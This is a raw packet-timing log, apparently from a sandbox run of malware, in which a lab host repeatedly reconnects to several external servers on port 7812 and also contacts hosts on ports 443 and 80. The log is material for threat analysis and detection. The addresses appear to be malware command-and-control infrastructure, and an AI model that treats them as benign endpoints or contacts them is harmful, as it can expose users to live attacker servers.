                                                  Sep 3, 2024 06:16:44.181818008 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.181826115 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.181849957 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.181858063 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.181919098 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.181924105 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.181946039 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.181956053 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.182015896 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.182020903 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:44.205277920 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:44.205282927 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.057452917 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.057529926 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.059597969 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.059598923 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.059632063 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.059647083 CEST44349733149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.059655905 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.059717894 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.059717894 CEST49733443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.059993982 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.060004950 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.663696051 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.665484905 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.665502071 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.960995913 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.961325884 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.961349964 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.961436033 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.961441040 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.961517096 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.961533070 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.961632967 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.961651087 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.961971998 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.961994886 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.962093115 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.962117910 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.962168932 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.962178946 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.962196112 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.962202072 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.962276936 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.962286949 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.962333918 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.962342978 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:48.962419987 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:48.962424040 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:49.422384977 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:49.422549009 CEST44349734149.154.167.220192.168.2.5
                                                  Sep 3, 2024 06:16:49.422705889 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:49.425121069 CEST49734443192.168.2.5149.154.167.220
                                                  Sep 3, 2024 06:16:50.111767054 CEST497197812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:16:50.116617918 CEST781249719146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:16:50.504517078 CEST781249719146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:16:50.504601002 CEST497197812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:16:50.908862114 CEST497197812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:16:50.910454988 CEST497377812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:16:50.914910078 CEST781249719146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:16:50.915361881 CEST781249737167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:16:50.915438890 CEST497377812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:16:50.933300972 CEST497377812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:16:50.941154957 CEST781249737167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:16:53.206801891 CEST781249720146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:16:53.206872940 CEST497207812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:16:53.207412958 CEST497207812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:16:53.212138891 CEST781249720146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:16:56.771030903 CEST804972291.134.207.16192.168.2.5
                                                  Sep 3, 2024 06:16:56.771097898 CEST4972280192.168.2.591.134.207.16
                                                  Sep 3, 2024 06:16:56.773624897 CEST4972280192.168.2.591.134.207.16
                                                  Sep 3, 2024 06:16:56.774029970 CEST4974080192.168.2.591.134.207.16
                                                  Sep 3, 2024 06:16:56.778956890 CEST804972291.134.207.16192.168.2.5
                                                  Sep 3, 2024 06:16:56.779249907 CEST804974091.134.207.16192.168.2.5
                                                  Sep 3, 2024 06:16:56.779381037 CEST4974080192.168.2.591.134.207.16
                                                  Sep 3, 2024 06:16:56.779481888 CEST4974080192.168.2.591.134.207.16
                                                  Sep 3, 2024 06:16:56.784205914 CEST804974091.134.207.16192.168.2.5
                                                  Sep 3, 2024 06:16:58.786684990 CEST497417812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:16:58.791616917 CEST781249741146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:16:58.794392109 CEST497417812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:01.924410105 CEST497377812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:01.930516958 CEST781249737167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:02.087661982 CEST78124972764.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:02.087724924 CEST497277812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:03.533236027 CEST8049707208.95.112.1192.168.2.5
                                                  Sep 3, 2024 06:17:03.533323050 CEST4970780192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:17:05.098732948 CEST497277812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:05.099195957 CEST497457812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:17:05.103598118 CEST78124972764.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:05.103988886 CEST781249745185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:17:05.104060888 CEST497457812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:17:05.104415894 CEST497457812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:17:05.109173059 CEST781249745185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:17:06.710881948 CEST781249745185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:17:06.711003065 CEST497457812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:17:07.427248955 CEST8049706208.95.112.1192.168.2.5
                                                  Sep 3, 2024 06:17:07.427320957 CEST4970680192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:17:09.722956896 CEST497457812192.168.2.5185.252.232.158
                                                  Sep 3, 2024 06:17:09.723825932 CEST497467812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:09.729973078 CEST781249745185.252.232.158192.168.2.5
                                                  Sep 3, 2024 06:17:09.731045961 CEST78124974664.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:09.731128931 CEST497467812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:09.731534004 CEST497467812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:09.736534119 CEST78124974664.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:12.269707918 CEST781249737167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:12.269778013 CEST497377812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:12.270215988 CEST497377812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:12.272711039 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:12.276076078 CEST781249737167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:12.277949095 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:12.278019905 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:12.297173977 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:12.302000999 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:14.909152031 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:14.914127111 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:16.674648046 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:16.679506063 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:18.148619890 CEST804974091.134.207.16192.168.2.5
                                                  Sep 3, 2024 06:17:18.148694992 CEST4974080192.168.2.591.134.207.16
                                                  Sep 3, 2024 06:17:18.148837090 CEST4974080192.168.2.591.134.207.16
                                                  Sep 3, 2024 06:17:18.153541088 CEST804974091.134.207.16192.168.2.5
                                                  Sep 3, 2024 06:17:18.565032959 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:18.569881916 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:19.377505064 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:19.382344961 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:20.148758888 CEST781249741146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:17:20.148835897 CEST497417812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:20.149260044 CEST497417812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:20.154331923 CEST781249741146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:17:23.877662897 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:23.882595062 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:23.971385002 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:23.976236105 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:24.424385071 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:24.430147886 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:25.626701117 CEST497547812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:25.631614923 CEST781249754146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:17:25.634984016 CEST497547812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:30.174945116 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:30.180202007 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:31.086700916 CEST78124974664.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:31.086818933 CEST497467812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:33.206963062 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:33.212573051 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:33.666819096 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:33.666892052 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:33.992990017 CEST497497812192.168.2.5165.227.91.90
                                                  Sep 3, 2024 06:17:33.994899035 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:33.997886896 CEST781249749165.227.91.90192.168.2.5
                                                  Sep 3, 2024 06:17:33.999735117 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:33.999814034 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:34.105920076 CEST497467812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:34.106678963 CEST497587812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:34.110698938 CEST78124974664.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:34.111469030 CEST78124975864.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:34.111562967 CEST497587812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:34.112857103 CEST497587812192.168.2.564.23.232.116
                                                  Sep 3, 2024 06:17:34.116847992 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:34.117661953 CEST78124975864.23.232.116192.168.2.5
                                                  Sep 3, 2024 06:17:34.121759892 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:35.408801079 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:35.413625956 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:43.978972912 CEST4970780192.168.2.5208.95.112.1
                                                  Sep 3, 2024 06:17:43.984236002 CEST8049707208.95.112.1192.168.2.5
                                                  Sep 3, 2024 06:17:46.643142939 CEST497577812192.168.2.5167.99.94.206
                                                  Sep 3, 2024 06:17:46.647960901 CEST781249757167.99.94.206192.168.2.5
                                                  Sep 3, 2024 06:17:46.973598003 CEST781249754146.190.29.250192.168.2.5
                                                  Sep 3, 2024 06:17:46.973654985 CEST497547812192.168.2.5146.190.29.250
                                                  Sep 3, 2024 06:17:46.974132061 CEST497547812192.168.2.5146.190.29.250
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 3, 2024 06:17:46.978960037 CEST | 7812 | 49754 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:17:46.987270117 CEST | 49757 | 7812 | 192.168.2.5 | 167.99.94.206
Sep 3, 2024 06:17:46.992202997 CEST | 7812 | 49757 | 167.99.94.206 | 192.168.2.5
Sep 3, 2024 06:17:47.176332951 CEST | 49757 | 7812 | 192.168.2.5 | 167.99.94.206
Sep 3, 2024 06:17:47.181957960 CEST | 7812 | 49757 | 167.99.94.206 | 192.168.2.5
Sep 3, 2024 06:17:48.130969048 CEST | 49757 | 7812 | 192.168.2.5 | 167.99.94.206
Sep 3, 2024 06:17:48.135807037 CEST | 7812 | 49757 | 167.99.94.206 | 192.168.2.5
Sep 3, 2024 06:17:50.755445004 CEST | 49757 | 7812 | 192.168.2.5 | 167.99.94.206
Sep 3, 2024 06:17:50.760349989 CEST | 7812 | 49757 | 167.99.94.206 | 192.168.2.5
Sep 3, 2024 06:17:52.550399065 CEST | 49763 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:17:52.555350065 CEST | 7812 | 49763 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:17:52.555413961 CEST | 49763 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:17:55.354190111 CEST | 7812 | 49757 | 167.99.94.206 | 192.168.2.5
Sep 3, 2024 06:17:55.354240894 CEST | 49757 | 7812 | 192.168.2.5 | 167.99.94.206
Sep 3, 2024 06:17:55.473505974 CEST | 7812 | 49758 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:17:55.473576069 CEST | 49758 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:17:58.488210917 CEST | 49758 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:17:58.488213062 CEST | 49766 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:17:58.493065119 CEST | 7812 | 49758 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:17:58.493077993 CEST | 7812 | 49766 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:17:58.493196011 CEST | 49766 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:17:58.493638992 CEST | 49766 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:17:58.498373032 CEST | 7812 | 49766 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:17:58.752449036 CEST | 49757 | 7812 | 192.168.2.5 | 167.99.94.206
Sep 3, 2024 06:17:58.754744053 CEST | 49767 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:17:58.757262945 CEST | 7812 | 49757 | 167.99.94.206 | 192.168.2.5
Sep 3, 2024 06:17:58.759610891 CEST | 7812 | 49767 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:17:58.759685040 CEST | 49767 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:17:58.792676926 CEST | 49767 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:17:58.797491074 CEST | 7812 | 49767 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:18:00.689907074 CEST | 49767 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:18:00.694735050 CEST | 7812 | 49767 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:18:08.835028887 CEST | 49767 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:18:08.839931011 CEST | 7812 | 49767 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:18:13.927268982 CEST | 7812 | 49763 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:13.927386045 CEST | 49763 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:13.930228949 CEST | 49763 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:13.935031891 CEST | 7812 | 49763 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:19.372195005 CEST | 49774 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:19.377396107 CEST | 7812 | 49774 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:19.381201029 CEST | 49774 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:19.850946903 CEST | 7812 | 49766 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:18:19.854650974 CEST | 49766 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:18:20.114748955 CEST | 7812 | 49767 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:18:20.117084026 CEST | 49767 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:18:22.815116882 CEST | 49767 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:18:22.817682028 CEST | 49776 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:22.820002079 CEST | 7812 | 49767 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:18:22.822527885 CEST | 7812 | 49776 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:22.822597980 CEST | 49776 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:22.860966921 CEST | 49776 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:22.865775108 CEST | 7812 | 49776 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:22.880091906 CEST | 49766 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:18:22.880650043 CEST | 49778 | 7812 | 192.168.2.5 | 185.252.232.158
Sep 3, 2024 06:18:22.884955883 CEST | 7812 | 49766 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:18:22.885423899 CEST | 7812 | 49778 | 185.252.232.158 | 192.168.2.5
Sep 3, 2024 06:18:22.885481119 CEST | 49778 | 7812 | 192.168.2.5 | 185.252.232.158
Sep 3, 2024 06:18:22.885941029 CEST | 49778 | 7812 | 192.168.2.5 | 185.252.232.158
Sep 3, 2024 06:18:22.890688896 CEST | 7812 | 49778 | 185.252.232.158 | 192.168.2.5
Sep 3, 2024 06:18:24.495863914 CEST | 7812 | 49778 | 185.252.232.158 | 192.168.2.5
Sep 3, 2024 06:18:24.496124029 CEST | 49778 | 7812 | 192.168.2.5 | 185.252.232.158
Sep 3, 2024 06:18:27.504306078 CEST | 49778 | 7812 | 192.168.2.5 | 185.252.232.158
Sep 3, 2024 06:18:27.504642010 CEST | 49779 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:18:27.509073973 CEST | 7812 | 49778 | 185.252.232.158 | 192.168.2.5
Sep 3, 2024 06:18:27.509391069 CEST | 7812 | 49779 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:18:27.509459972 CEST | 49779 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:18:27.509747982 CEST | 49779 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:18:27.514488935 CEST | 7812 | 49779 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:18:37.315253019 CEST | 49776 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:37.320280075 CEST | 7812 | 49776 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:40.867142916 CEST | 7812 | 49774 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:40.867202997 CEST | 49774 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:40.867682934 CEST | 49774 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:40.872486115 CEST | 7812 | 49774 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:44.183444023 CEST | 7812 | 49776 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:44.183670998 CEST | 49776 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:45.867068052 CEST | 49786 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:45.872013092 CEST | 7812 | 49786 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:45.873377085 CEST | 49786 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:47.362359047 CEST | 49776 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:47.364968061 CEST | 49787 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:47.367451906 CEST | 7812 | 49776 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:47.369879007 CEST | 7812 | 49787 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:47.369950056 CEST | 49787 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:47.401701927 CEST | 49787 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:18:47.406537056 CEST | 7812 | 49787 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:18:48.866769075 CEST | 7812 | 49779 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:18:48.866837025 CEST | 49779 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:18:51.879762888 CEST | 49779 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:18:51.880214930 CEST | 49790 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:18:51.884602070 CEST | 7812 | 49779 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:18:51.885019064 CEST | 7812 | 49790 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:18:51.885108948 CEST | 49790 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:18:51.885489941 CEST | 49790 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:18:51.890255928 CEST | 7812 | 49790 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:19:00.002456903 CEST | 49787 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:00.007390976 CEST | 7812 | 49787 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:07.261976004 CEST | 7812 | 49786 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:07.262046099 CEST | 49786 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:07.262370110 CEST | 49786 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:07.267173052 CEST | 7812 | 49786 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:08.760066986 CEST | 7812 | 49787 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:08.761318922 CEST | 49787 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:08.762584925 CEST | 49795 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:19:08.762584925 CEST | 49787 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:08.767460108 CEST | 7812 | 49795 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:19:08.767508984 CEST | 7812 | 49787 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:08.767685890 CEST | 49795 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:19:08.789238930 CEST | 49795 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:19:08.794282913 CEST | 7812 | 49795 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:19:12.651720047 CEST | 49796 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:12.656718969 CEST | 7812 | 49796 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:12.656790972 CEST | 49796 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:13.253923893 CEST | 7812 | 49790 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:19:13.254100084 CEST | 49790 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:19:16.282469988 CEST | 49790 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:19:16.282964945 CEST | 49799 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:19:16.287377119 CEST | 7812 | 49790 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:19:16.287743092 CEST | 7812 | 49799 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:19:16.287803888 CEST | 49799 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:19:16.288110018 CEST | 49799 | 7812 | 192.168.2.5 | 64.23.232.116
Sep 3, 2024 06:19:16.292860031 CEST | 7812 | 49799 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:19:23.629307032 CEST | 49795 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:19:23.634313107 CEST | 7812 | 49795 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:19:30.152757883 CEST | 7812 | 49795 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:19:30.153265953 CEST | 49795 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:19:32.155757904 CEST | 49795 | 7812 | 192.168.2.5 | 165.227.91.90
Sep 3, 2024 06:19:32.157645941 CEST | 49804 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:32.160620928 CEST | 7812 | 49795 | 165.227.91.90 | 192.168.2.5
Sep 3, 2024 06:19:32.162431955 CEST | 7812 | 49804 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:32.165186882 CEST | 49804 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:32.199407101 CEST | 49804 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:32.204385042 CEST | 7812 | 49804 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:34.022505999 CEST | 7812 | 49796 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:34.022603989 CEST | 49796 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:34.022943020 CEST | 49796 | 7812 | 192.168.2.5 | 146.190.29.250
Sep 3, 2024 06:19:34.027755022 CEST | 7812 | 49796 | 146.190.29.250 | 192.168.2.5
Sep 3, 2024 06:19:37.651176929 CEST | 7812 | 49799 | 64.23.232.116 | 192.168.2.5
Sep 3, 2024 06:19:37.651249886 CEST | 49799 | 7812 | 192.168.2.5 | 64.23.232.116
